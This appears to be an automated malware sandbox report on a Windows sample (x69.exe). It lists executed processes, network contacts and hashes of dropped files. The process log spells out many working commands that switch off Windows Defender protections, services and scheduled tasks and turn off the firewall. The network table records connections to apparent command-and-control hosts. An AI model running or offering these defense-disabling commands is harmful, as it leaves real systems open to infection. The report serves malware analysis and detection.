"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2792 -prefsLen 32952 -prefMapHandle 2788 -prefMapSize 270279 -jsInitHandle 5588 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4964 -initialChannelId {833f46d8-5d08-4bcf-97aa-0ab767e614eb} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5752 -prefsLen 32952 -prefMapHandle 5756 -prefMapSize 270279 -jsInitHandle 5760 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5768 -initialChannelId {c52553ae-623b-4cf8-abe0-c9caf8df8d81} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5940 -prefsLen 32952 -prefMapHandle 5944 -prefMapSize 270279 -jsInitHandle 5948 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5956 -initialChannelId {814d3c91-a892-4a30-ad0e-fac83d3d0178} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "REG ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f"
C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD “hklm\software\policies\microsoft\windows defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "netsh advfirewall set allprofiles state off"
C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{a19242dc-96bb-48ca-9b49-86f1ad87c554}
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{3f5ca867-fddd-4c7c-b435-bd2d7a17afcf}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2772 -prefsLen 35427 -prefMapHandle 5568 -prefMapSize 270279 -jsInitHandle 4732 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6540 -initialChannelId {fb3dfaa7-d842-4fb9-96c9-1be6c997c09f} -parentPid 3188 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3188" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\TCPView\tcpview64.exe
"C:\Users\Admin\Downloads\TCPView\tcpview64.exe"
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\020251ea.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1c955ede.bat" "
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | ddos.dnsnb8.net | udp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | checkappexec.microsoft.com | udp |
| GB | 51.140.244.186:443 | checkappexec.microsoft.com | tcp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | spocs.getpocket.com | udp |
| US | 34.36.137.203:443 | spocs.getpocket.com | udp |
| US | 8.8.8.8:53 | mc.prod.ads.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | merino.services.mozilla.com | udp |
| US | 8.8.8.8:53 | mc.prod.ads.prod.webservices.mozgcp.net | udp |
| US | 34.110.138.217:443 | merino.services.mozilla.com | udp |
| US | 8.8.8.8:53 | merino.services.mozilla.com | udp |
| US | 34.110.138.217:443 | merino.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | merino.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-chains.prod.autograph.services.mozaws.net | udp |
| US | 8.8.8.8:53 | content-signature-chains.prod.autograph.services.mozaws.net | udp |
| US | 8.8.8.8:53 | example.org | udp |
| US | 8.8.8.8:53 | ipv4only.arpa | udp |
| US | 8.8.8.8:53 | prod.detectportal.prod.cloudops.mozgcp.net | udp |
| US | 34.107.221.82:80 | prod.detectportal.prod.cloudops.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.detectportal.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | grayhatgroupontop.zapto.org | udp |
| EG | 197.160.170.172:1177 | grayhatgroupontop.zapto.org | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| N/A | 127.0.0.1:50177 | | tcp |
| N/A | 127.0.0.1:50213 | | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.190.72.216:443 | location.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.classify-client.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | archive.mozilla.org | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| US | 151.101.195.19:443 | archive.mozilla.org | tcp |
| US | 8.8.8.8:53 | mozilla-download.fastly-edge.com | udp |
| US | 34.104.35.123:443 | edgedl.me.gvt1.com | tcp |
| DE | 23.53.40.129:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | mozilla-download.fastly-edge.com | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | learn.microsoft.com | udp |
| US | 8.8.8.8:53 | e13636.dscb.akamaiedge.net | udp |
| GB | 184.25.193.230:443 | learn.microsoft.com | tcp |
| US | 8.8.8.8:53 | e13636.dscb.akamaiedge.net | udp |
| US | 8.8.8.8:53 | mscom.demdex.net | udp |
| US | 8.8.8.8:53 | wcpstatic.microsoft.com | udp |
| US | 8.8.8.8:53 | js.monitor.azure.com | udp |
| IE | 54.170.135.45:443 | mscom.demdex.net | tcp |
| US | 8.8.8.8:53 | dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com | udp |
| US | 13.107.246.64:443 | js.monitor.azure.com | tcp |
| US | 8.8.8.8:53 | s-part-0036.t-0009.t-msedge.net | udp |
| US | 13.107.246.64:443 | s-part-0036.t-0009.t-msedge.net | tcp |
| US | 8.8.8.8:53 | s-part-0036.t-0009.t-msedge.net | udp |
| US | 8.8.8.8:53 | dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 104.208.16.95:443 | browser.events.data.microsoft.com | tcp |
| US | 104.208.16.95:443 | browser.events.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | onedscolprdcus20.centralus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | onedscolprdcus20.centralus.cloudapp.azure.com | udp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | onedscolprdcus20.centralus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | download.sysinternals.com | udp |
| US | 13.107.246.64:443 | download.sysinternals.com | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 216.58.201.99:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdeus14.eastus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | onedscolprdeus14.eastus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | browser.events.data.microsoft.com | udp |
| US | 8.8.8.8:53 | onedscolprdcus12.centralus.cloudapp.azure.com | udp |
| US | 8.8.8.8:53 | onedscolprdcus12.centralus.cloudapp.azure.com | udp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
| US | 3.229.117.57:799 | ddos.dnsnb8.net | tcp |
Files
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
| MD5 | b741dc9818a1f9945008122106d23b64 |
| SHA1 | 212e4fa9424bf53239098b458aec3b4ed842f671 |
| SHA256 | 3ba8dacf6de4f0f5444c3dc9abe437920a80add5a57538e3fb63157ec7fe6582 |
| SHA512 | be85279c815ad5703cf5e7730d28522d1c3d5cea0f69865bb6aee64405a2dcca016b35d60568463df2365080e0b76ff46c383d5e86127effb10b24cff26df951 |
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\voxb8dut.default-release\thumbnails\fcab4f1d5f80483c22cd2df1261e76ce.png
| MD5 | cdd3addeec1ae691b256c029e4eba91a |
| SHA1 | 97463be01f67ec4e03b3d5083d6e880850440c4b |
| SHA256 | e97412741d2408441419233d143bcbb4ac342f6c0a642f271eadd4f3a640da9a |
| SHA512 | 2e743936a350c4c4628ee644d5aa0c34e4576e9f5154c605c2ffdd5fd75be7f2c08a58059eb7239e1ab4faeabf1f2cb574537535bac82833c5adbb0e049c129a |
C:\Users\Admin\Downloads\TCPView.aRMYCrsz.zip.part
| MD5 | 0db74b666d6dc61a26e4cb217bb05f24 |
| SHA1 | 1da8cef179836761535b045a850ea8ccc423b4b5 |
| SHA256 | 4fc5ceba3e1b27ad95a24df35d094b454ec5f9478e12a8ca2b1b222705b9683b |
| SHA512 | 35dac71cfbd9c39622c378ba437b37c1ce6411cdd3b7258ab854a69e549b765db2fd8d38a7f911509780fcc42922529a23b4eded3e86147d1a372aa3bd1bccd9 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 93dbeb89a54decb226f2e73c59824e17 |
| SHA1 | d840d24c9d064e93cd824dc236278142ae7d49eb |
| SHA256 | fff0c3cc32bc64d8c29b11d8c5551056d2da9a7d8188ea9579fa382fa5baf1cc |
| SHA512 | f457f82da35b4180196591bd7b9b729172b4e43ada9a057c7ce733e435ed07cde5481e4688a1ffe32d37c81efdfe266523f5fe78ffaabde83700587f519aff79 |
C:\Users\Admin\Downloads\TCPView\tcpvcon64a.exe
| MD5 | cadc6c6933708f6e8e0707d930882ae6 |
| SHA1 | 4b00337b1bf413fe69be70f28ead3685569fa480 |
| SHA256 | 0e85278ca6617dcd61af1e84dea1e3049be0539ca492b5731ddf85545db00390 |
| SHA512 | 80c741ea2bb7d1cf672a75b0ae4068fb465a5c87b49efbafef6edc4dd56576d5f7f5fde6e272606142d3678cbf38e4b11081d6e5e4ba9f52950b0f5608e055f9 |
C:\Users\Admin\Downloads\TCPView\tcpview64a.exe
| MD5 | 2852e3ac78790dc513b6ff5b34a2a476 |
| SHA1 | f2ad2f1d1316aaca85e3071020a7c97588417149 |
| SHA256 | fca26bd5a35267a2ff19317c9e4f7642517d9d8795dcf50c65ff036298d6255b |
| SHA512 | f0ac49732d88ee3527af4473fa05a7a1d9756b70c61e73e7655edc42118423b371fa9ed5777f9b05abcf84a883e515cd4c8b6dfac13027c17c72d2a8f5102633 |
C:\Users\Admin\Downloads\TCPView\tcpvcon.exe
| MD5 | 356ed0fc156993551a484964f99e65b8 |
| SHA1 | 6b936b5a5b4451bc4f147dad6cd2a7072a799d03 |
| SHA256 | 37621bdac3ced1103278e8c0ef7b73dfa1cbe9becfbaff421a46fbc78d636b5f |
| SHA512 | 8060b018f256ddf4dbde002b6d6b526362c617cbe8f1930a88cb4f191542240530658e8a7b6ed5c496436bcafaac0a6898e67187c3c8854e73ce6f66809c5fd0 |
C:\Users\Admin\Downloads\TCPView\tcpview.exe
| MD5 | 7ce89829f9fb955dc377529c461852fd |
| SHA1 | 8b14f5345bfcfac08c31c284c1a0eee2cd53bcfb |
| SHA256 | 9775b4bbe23b8eb93727efe0a6d0b160ae5132a10b223f43200499cf0051a18f |
| SHA512 | 7b9cd587ba53f632a1eff914a6a4bfc345b2232ed6dc02dfefa9bc9aebe06ff7836c1698077f41483a34b0610e92549b1a4baf8b9e9b29c28469f53ec6722e0c |
C:\Users\Admin\Downloads\TCPView\tcpvcon64.exe
| MD5 | 93d2aea4b5923f7b63a4ec2ef3dd9c68 |
| SHA1 | 402b0d55f36e67153939b5ec9a91493e2671b9db |
| SHA256 | f9fdc027050d59608062a95c41e3965e3800fd5a91f35de080a432d62bd129c1 |
| SHA512 | 193e4451dc5bfd0aadd9f9d8450f4f31b8189d8bc36fa1b16dc935c5848a975a72a7f46e60d2f4b9f9f8e65a27c8bb7ccfc01359598025a0d46b138bc5903e44 |
C:\Users\Admin\Downloads\TCPView\tcpview64.exe
| MD5 | e6a59b12c9ff25259178f5645b8749b1 |
| SHA1 | e59dc87c158bb02690e577d3d1bdb169cf89eee6 |
| SHA256 | 0cbcb7ec4a042622b0d9d91b18f908e4208e4725ee1fa74a3555c4dcb622cfc1 |
| SHA512 | 25bf745ff9a61d4ad7a02c1fc39f4972941d90ebf2eef07fbc6e7124629e90c28be6191cae35a403ffb7c9e55968371ba2d46bfe807939de5c35909584677160 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\sessionstore-backups\recovery.baklz4
| MD5 | 694df7fbe0c9759de87304802c1b7c36 |
| SHA1 | 1cbd7ec9a0211df7b24ff18cf5b94b2732acd2cb |
| SHA256 | 1a4715fb275b553ba14edf79b4f5675e4c406fc8ca171f079767be3cc27d57cc |
| SHA512 | 173037183185b0c4f99a14ed5434c27d8b39dc571c2e363989330a4e97d1f3a68f9c960c1b42cab1d6a58063ba74a23b5a5c1d5395c1df86429eb2c1d73a227b |
memory/4008-3010-0x0000000000E70000-0x0000000000E79000-memory.dmp
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\db\data.safe.tmp
| MD5 | 8253dbaa8f3fe11a5ac8e6df6760cc87 |
| SHA1 | a1ecfabfbe37a30ae9b89a80872c18e391c6ab55 |
| SHA256 | e3fc86329b2186155b41b8ba2a13cd61c9ff1dfd4f81314cd2d7e848685420a3 |
| SHA512 | 748e1e7ba3ec5a9af90b6ae5f9091ab92002a2e8047d43203deca904a89226299640867e0ad99cdf5fb09739ed0281e70865e962339116babbd61f9de4727171 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\datareporting\glean\pending_pings\63a68016-4732-479f-b1c4-6d6e27777188
| MD5 | f94cc7c8678eca6702a2c4162952474a |
| SHA1 | dd15d9da203883a2f2efcb64aca95c6fbade71b8 |
| SHA256 | 943a0caf8ac4670d2dd07ba33ba020047381a5df69c61aae05f2323857bedd2d |
| SHA512 | d291ece38c78e63f5d622468e4dc04b3dd63d833d6b4a4af118c3d767f57a8baeb63429be4d134ffffdca9a1e915980c518dbb11d0d8b0baab599df4ea36a8d4 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\voxb8dut.default-release\prefs-1.js
| MD5 | c678a2d4f9f2f21129c3f3f941d5a9c3 |
